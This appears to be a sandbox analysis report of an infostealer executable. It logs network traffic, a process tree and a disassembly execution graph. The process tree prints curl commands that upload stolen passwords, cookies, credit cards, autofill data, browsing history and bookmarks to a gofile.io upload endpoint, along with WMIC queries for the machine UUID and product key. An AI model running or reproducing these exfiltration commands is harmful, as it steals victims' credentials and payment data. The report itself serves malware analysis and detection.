                                                                                                                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.44973145.112.123.1264437084C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:43:18 UTC124OUTGET /servers HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: api.gofile.io
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-12-21 20:43:19 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.27.1
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:43:19 GMT
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 401
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                      Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                      Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                                      X-Download-Options: noopen
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      ETag: W/"191-cA1AjYfVMPn12HUIpxVTAsdaZX4"
                                                                                                                                                                                                                                                      2024-12-21 20:43:19 UTC401INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 2d 65 75 2d 70 61 72 2d 33 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 35 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 34 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 32 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 5d 2c 22 73 65 72 76 65 72 73 41 6c 6c 5a 6f 6e 65 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 2d 65 75 2d 70 61 72 2d 33 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 33 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65
                                                                                                                                                                                                                                                      Data Ascii: {"status":"ok","data":{"servers":[{"name":"store-eu-par-3","zone":"eu"},{"name":"store5","zone":"eu"},{"name":"store4","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store-eu-par-3","zone":"eu"},{"name":"store3","zone":"na"},{"name


                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:15:43:07
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6aba40000
                                                                                                                                                                                                                                                      File size:27'577'634 bytes
                                                                                                                                                                                                                                                      MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:15:43:07
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                      Start time:15:43:10
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6aba40000
                                                                                                                                                                                                                                                      File size:27'577'634 bytes
                                                                                                                                                                                                                                                      MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:15:43:13
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:15:43:18
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                      Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                      Imagebase:0x7ff62e1f0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:wmic path softwarelicensingservice get OA3xOriginalProductKey
                                                                                                                                                                                                                                                      Imagebase:0x7ff626a60000
                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                      Imagebase:0x7ff62e1f0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                      Start time:15:43:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                      Imagebase:0x7ff62e1f0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                      Start time:15:43:20
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                      Start time:15:43:20
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                      Imagebase:0x7ff62e1f0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                      Start time:15:43:20
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                      Start time:15:43:20
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                      Imagebase:0x7ff62e1f0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                      Start time:15:43:20
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                      Imagebase:0x7ff77b600000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                      Start time:15:43:23
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                      Imagebase:0x7ff7293b0000
                                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:10%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:16.1%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:68
                                                                                                                                                                                                                                                        execution_graph 21104 7ff6aba6c06e 21105 7ff6aba6c07d 21104->21105 21106 7ff6aba6c087 21104->21106 21108 7ff6aba615a8 LeaveCriticalSection 21105->21108 21304 7ff6aba6bfd9 21307 7ff6aba562e8 LeaveCriticalSection 21304->21307 20547 7ff6aba565e4 20548 7ff6aba5661b 20547->20548 20549 7ff6aba565fe 20547->20549 20548->20549 20551 7ff6aba5662e CreateFileW 20548->20551 20550 7ff6aba55e28 _fread_nolock 11 API calls 20549->20550 20552 7ff6aba56603 20550->20552 20553 7ff6aba56698 20551->20553 20554 7ff6aba56662 20551->20554 20556 7ff6aba55e48 _get_daylight 11 API calls 20552->20556 20598 7ff6aba56bc0 20553->20598 20572 7ff6aba56738 GetFileType 20554->20572 20559 7ff6aba5660b 20556->20559 20563 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20559->20563 20561 7ff6aba566cc 20619 7ff6aba56980 20561->20619 20562 7ff6aba566a1 20566 7ff6aba55dbc _fread_nolock 11 API calls 20562->20566 20568 7ff6aba56616 20563->20568 20564 7ff6aba5668d CloseHandle 20564->20568 20565 7ff6aba56677 CloseHandle 20565->20568 20571 7ff6aba566ab 20566->20571 20571->20568 20573 7ff6aba56786 20572->20573 20574 7ff6aba56843 20572->20574 20575 7ff6aba567b2 GetFileInformationByHandle 20573->20575 20579 7ff6aba56abc 21 API calls 20573->20579 20576 7ff6aba5684b 20574->20576 20577 7ff6aba5686d 20574->20577 20580 7ff6aba567db 20575->20580 20581 7ff6aba5685e GetLastError 20575->20581 20576->20581 20582 7ff6aba5684f 20576->20582 20578 7ff6aba56890 PeekNamedPipe 20577->20578 20597 7ff6aba5682e 20577->20597 20578->20597 20586 7ff6aba567a0 20579->20586 20583 7ff6aba56980 51 API calls 20580->20583 20585 7ff6aba55dbc _fread_nolock 11 API calls 20581->20585 20584 7ff6aba55e48 _get_daylight 11 API calls 20582->20584 20587 7ff6aba567e6 20583->20587 20584->20597 20585->20597 20586->20575 20586->20597 20636 7ff6aba568e0 20587->20636 20588 7ff6aba4bb10 _log10_special 8 API calls 20590 7ff6aba56670 20588->20590 20590->20564 20590->20565 20592 7ff6aba568e0 10 API calls 20593 7ff6aba56805 20592->20593 20594 7ff6aba568e0 10 API calls 20593->20594 20595 7ff6aba56816 20594->20595 20596 7ff6aba55e48 _get_daylight 11 API calls 20595->20596 20595->20597 20596->20597 20597->20588 20599 7ff6aba56bf6 20598->20599 20600 7ff6aba55e48 _get_daylight 11 API calls 20599->20600 20613 7ff6aba56c8e __std_exception_copy 20599->20613 20602 7ff6aba56c08 20600->20602 20601 7ff6aba4bb10 _log10_special 8 API calls 20603 7ff6aba5669d 20601->20603 20604 7ff6aba55e48 _get_daylight 11 API calls 20602->20604 20603->20561 20603->20562 20605 7ff6aba56c10 20604->20605 20606 7ff6aba58d44 45 API calls 20605->20606 20607 7ff6aba56c25 20606->20607 20608 7ff6aba56c2d 20607->20608 20609 7ff6aba56c37 20607->20609 20610 7ff6aba55e48 _get_daylight 11 API calls 20608->20610 20611 7ff6aba55e48 _get_daylight 11 API calls 20609->20611 20618 7ff6aba56c32 20610->20618 20612 7ff6aba56c3c 20611->20612 20612->20613 20614 7ff6aba55e48 _get_daylight 11 API calls 20612->20614 20613->20601 20615 7ff6aba56c46 20614->20615 20617 7ff6aba58d44 45 API calls 20615->20617 20616 7ff6aba56c80 GetDriveTypeW 20616->20613 20617->20618 20618->20613 20618->20616 20620 7ff6aba569a8 20619->20620 20628 7ff6aba566d9 20620->20628 20643 7ff6aba60994 20620->20643 20622 7ff6aba56a3c 20623 7ff6aba60994 51 API calls 20622->20623 20622->20628 20624 7ff6aba56a4f 20623->20624 20625 7ff6aba60994 51 API calls 20624->20625 20624->20628 20626 7ff6aba56a62 20625->20626 20627 7ff6aba60994 51 API calls 20626->20627 20626->20628 20627->20628 20629 7ff6aba56abc 20628->20629 20630 7ff6aba56ad6 20629->20630 20631 7ff6aba56b0d 20630->20631 20632 7ff6aba56ae6 20630->20632 20633 7ff6aba60828 21 API calls 20631->20633 20634 7ff6aba55dbc _fread_nolock 11 API calls 20632->20634 20635 